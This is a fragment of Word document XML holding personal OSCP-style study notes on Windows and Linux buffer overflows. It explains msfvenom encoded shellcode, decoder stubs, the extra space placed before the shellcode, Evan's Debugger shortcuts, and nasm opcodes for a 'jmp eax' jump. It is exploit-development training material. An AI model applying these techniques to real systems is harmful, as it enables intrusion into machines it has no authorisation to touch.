          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00483F8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>buffer overflow\windows\final</w:t>
        </w:r>
        <w:r w:rsidR="00495994">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>\</w:t>
        </w:r>
        <w:r w:rsidRPr="00483F8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="00483F8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:iCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ctrl+click</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC0C1F1" w14:textId="77777777" w:rsidR="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00FF6182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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="401473D9" w14:textId="7E82C3BD" w:rsidR="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00FF6182">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3974"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>GETTING A SHELL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E979C8D" w14:textId="7DB3D123" w:rsidR="00FF6182" w:rsidRPr="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00FF6182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 xml:space="preserve"> We </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6182">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>generated an encoded shellcode using msfvenom. Because of the encoding, the shellcode is not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DC7E1" w14:textId="77777777" w:rsidR="00FF6182" w:rsidRPr="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00FF6182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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6182">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>directly executable and is therefore prepended by a decoder stub. The job of this stub is to iterate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC9E9D8" w14:textId="77777777" w:rsidR="00FF6182" w:rsidRPr="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00FF6182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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6182">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>over the encoded shellcode bytes and decode them back to their original executable form. In order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661CB48B" w14:textId="77777777" w:rsidR="00FF6182" w:rsidRPr="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00FF6182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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6182">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to perform this task, the decoder needs to gather its address in memory and from there, look a few</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C2630" w14:textId="05618C13" w:rsidR="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00FF6182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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6182">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bytes ahead to locate the encoded shellcode that it needs to decode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B1716" w14:textId="77777777" w:rsidR="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00FF6182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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A4769BB" w14:textId="2B6929E1" w:rsidR="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00FF6182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 xml:space="preserve">In short </w:t>
      </w:r>
      <w:r w:rsidR="003C2CAC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the deencoding process writes some unwanted data before the shell code and hence it rewrites itself  and the target fails ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39451CA8" w14:textId="77777777" w:rsidR="003C2CAC" w:rsidRDefault="003C2CAC" w:rsidP="00FF6182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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C787633" w14:textId="584E75F0" w:rsidR="003C2CAC" w:rsidRPr="00FF6182" w:rsidRDefault="003C2CAC" w:rsidP="00FF6182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>Solutuion:  we can provide an extra space before the shellcode as an Launchpad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52D2C7" w14:textId="4078F057" w:rsidR="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00FF6182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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F5E939" w14:textId="77777777" w:rsidR="00FF6182" w:rsidRDefault="00FF6182" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9F7F1F" w14:textId="77777777" w:rsidR="00E56FD9" w:rsidRDefault="00E56FD9" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CFE8E22" w14:textId="77777777" w:rsidR="00E56FD9" w:rsidRDefault="00E56FD9" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A20F96" w14:textId="77777777" w:rsidR="009F0A3A" w:rsidRPr="006C4CEE" w:rsidRDefault="009F0A3A" w:rsidP="00D56040">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3974"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193B5A35" w14:textId="77777777" w:rsidR="003A5610" w:rsidRDefault="003A5610" w:rsidP="00D914C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3974"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="158E2826" w14:textId="77777777" w:rsidR="00D914C0" w:rsidRPr="00D914C0" w:rsidRDefault="00D914C0" w:rsidP="00D914C0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77866D59" w14:textId="77777777" w:rsidR="001B291E" w:rsidRPr="001B291E" w:rsidRDefault="001B291E" w:rsidP="00E16CEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C7D646" w14:textId="77777777" w:rsidR="00E16CEE" w:rsidRDefault="00E16CEE" w:rsidP="0045413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37752DDF" w14:textId="77777777" w:rsidR="00BE3F69" w:rsidRPr="007E14BE" w:rsidRDefault="00BE3F69" w:rsidP="0045413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710105E9" w14:textId="77777777" w:rsidR="007E14BE" w:rsidRDefault="007E14BE" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F2E76A" w14:textId="4CFCB976" w:rsidR="00DA1D2E" w:rsidRDefault="00DA1D2E" w:rsidP="00DA1D2E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/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>LINUX BUFFER OVERFLOW</w:t>
      </w:r>
      <w:r w:rsidRPr="00261D13">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491533EB" w14:textId="6987F72D" w:rsidR="008B508E" w:rsidRDefault="008B508E" w:rsidP="008B508E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Recent versions of linux kernels have well implemented way of avoiding buffer overflow.More advanced methods are there </w:t>
      </w:r>
      <w:r w:rsidR="00237634">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>but are not implemented in oscp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5CA83" w14:textId="18CC4BD3" w:rsidR="00237634" w:rsidRDefault="00237634" w:rsidP="008B508E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00237634">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>LINUX DEBUGGER:  EVAN’S DEBUGGER.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">   (EDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7085AD86" w14:textId="7A3D9EAC" w:rsidR="00237634" w:rsidRDefault="00237634" w:rsidP="008B508E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SHIFT+F3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt;To</w:t>
      </w:r>
      <w:r w:rsidRPr="00237634">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> attach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> a processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D90B6A" w14:textId="4A53A1AD" w:rsidR="00237634" w:rsidRDefault="00237634" w:rsidP="008B508E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>F9=&gt; To run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20225D74" w14:textId="3952A9BD" w:rsidR="00237634" w:rsidRDefault="00237634" w:rsidP="00980E97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3346964C" w14:textId="3600A4E5" w:rsidR="00980E97" w:rsidRDefault="00980E97" w:rsidP="00980E97">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00980E97">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>IMP NOTES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C031F01" w14:textId="77777777" w:rsidR="00980E97" w:rsidRDefault="00980E97" w:rsidP="0098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CodePro-Bold" w:hAnsi="SourceCodePro-Bold" w:cs="SourceCodePro-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SourceCodePro-Regular" w:hAnsi="SourceCodePro-Regular" w:cs="SourceCodePro-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SourceCodePro-Bold" w:hAnsi="SourceCodePro-Bold" w:cs="SourceCodePro-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msf-nasm_shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC96778" w14:textId="77777777" w:rsidR="00980E97" w:rsidRDefault="00980E97" w:rsidP="0098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CodePro-Bold" w:hAnsi="SourceCodePro-Bold" w:cs="SourceCodePro-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SourceCodePro-Regular" w:hAnsi="SourceCodePro-Regular" w:cs="SourceCodePro-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">nasm &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SourceCodePro-Bold" w:hAnsi="SourceCodePro-Bold" w:cs="SourceCodePro-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>add eax,12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F93350C" w14:textId="77777777" w:rsidR="00980E97" w:rsidRDefault="00980E97" w:rsidP="0098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000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SourceCodePro-Regular" w:hAnsi="SourceCodePro-Regular" w:cs="SourceCodePro-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>00000000 83C00C add eax,byte +0xc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66C7A7" w14:textId="77777777" w:rsidR="00980E97" w:rsidRDefault="00980E97" w:rsidP="0098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CodePro-Bold" w:hAnsi="SourceCodePro-Bold" w:cs="SourceCodePro-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SourceCodePro-Regular" w:hAnsi="SourceCodePro-Regular" w:cs="SourceCodePro-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">nasm &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SourceCodePro-Bold" w:hAnsi="SourceCodePro-Bold" w:cs="SourceCodePro-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jmp eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C2C360" w14:textId="2B0637A6" w:rsidR="00980E97" w:rsidRPr="00980E97" w:rsidRDefault="00980E97" w:rsidP="0098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  <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SourceCodePro-Regular" w:hAnsi="SourceCodePro-Regular" w:cs="SourceCodePro-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>00000000 FFE0 jmp eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07057B16" w14:textId="77777777" w:rsidR="00237634" w:rsidRDefault="00237634" w:rsidP="008B508E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3D4751" w14:textId="77777777" w:rsidR="00237634" w:rsidRPr="00237634" w:rsidRDefault="00237634" w:rsidP="008B508E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1663C4C1" w14:textId="5712AFBA" w:rsidR="00DA1D2E" w:rsidRDefault="00980E97" w:rsidP="00DA1D2E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>To check for bad characters we use the same approach as the windows buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EC5E3F" w14:textId="77777777" w:rsidR="00980E97" w:rsidRDefault="00980E97" w:rsidP="00DA1D2E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E84B09" w14:textId="4622506C" w:rsidR="00980E97" w:rsidRPr="00980E97" w:rsidRDefault="00980E97" w:rsidP="00DA1D2E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding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return address we use </w:t>
      </w:r>
      <w:r w:rsidR="009F515A">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F515A" w:rsidRPr="009F515A">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ctrl+O</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F515A" w:rsidRPr="009F515A">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">   instead</w:t>
      </w:r>
      <w:r w:rsidR="009F515A">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F515A">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F515A">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F84B6E7" w14:textId="77777777" w:rsidR="007E14BE" w:rsidRDefault="007E14BE" w:rsidP="00DA1D2E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01699BD5" w14:textId="77777777" w:rsidR="007E14BE" w:rsidRDefault="007E14BE" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8BDAAC" w14:textId="77777777" w:rsidR="007E14BE" w:rsidRPr="00BC790D" w:rsidRDefault="007E14BE" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F19CC4" w14:textId="77777777" w:rsidR="00B500D2" w:rsidRPr="00F14B62" w:rsidRDefault="00B500D2" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155785E7" w14:textId="146C9FA8" w:rsidR="00E75B17" w:rsidRDefault="00B500D2" w:rsidP="00817E79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t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C22FD59" w14:textId="77777777" w:rsidR="00E75B17" w:rsidRDefault="00E75B17" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D952A9" w14:textId="77777777" w:rsidR="00E75B17" w:rsidRPr="00195754" w:rsidRDefault="00E75B17" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52418B45" w14:textId="77777777" w:rsidR="006C08BD" w:rsidRPr="00817E79" w:rsidRDefault="006C08BD" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A0DC22" w14:textId="77777777" w:rsidR="00817E79" w:rsidRPr="00817E79" w:rsidRDefault="00817E79" w:rsidP="00817E79">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00817E79" w:rsidRPr="00817E79" w:rsidSect="00B015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Regula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SourceCodePro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47068"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20547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1691F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB2604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518FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C46FC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536AC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="054C85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62663"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D302A00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A7E09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF6E2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C594B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A94C4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C68DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B29EE2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7514D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F94E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13B6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2570B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43A1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB2604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10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A4"/>
    <w:rsid w:val="00027FC3"/>
    <w:rsid w:val="00195754"/>
    <w:rsid w:val="001B291E"/>
    <w:rsid w:val="00210A90"/>
    <w:rsid w:val="00237634"/>
    <w:rsid w:val="00243FC0"/>
    <w:rsid w:val="00261D13"/>
    <w:rsid w:val="00332D7D"/>
    <w:rsid w:val="003A5610"/>
    <w:rsid w:val="003B3EE2"/>
    <w:rsid w:val="003C2CAC"/>
    <w:rsid w:val="003E6254"/>
    <w:rsid w:val="0045413E"/>
    <w:rsid w:val="00483F8C"/>
    <w:rsid w:val="00495994"/>
    <w:rsid w:val="004C350D"/>
    <w:rsid w:val="00500A2F"/>
    <w:rsid w:val="005220FA"/>
    <w:rsid w:val="00570D4D"/>
    <w:rsid w:val="00573CF1"/>
    <w:rsid w:val="006553EB"/>
    <w:rsid w:val="0066080F"/>
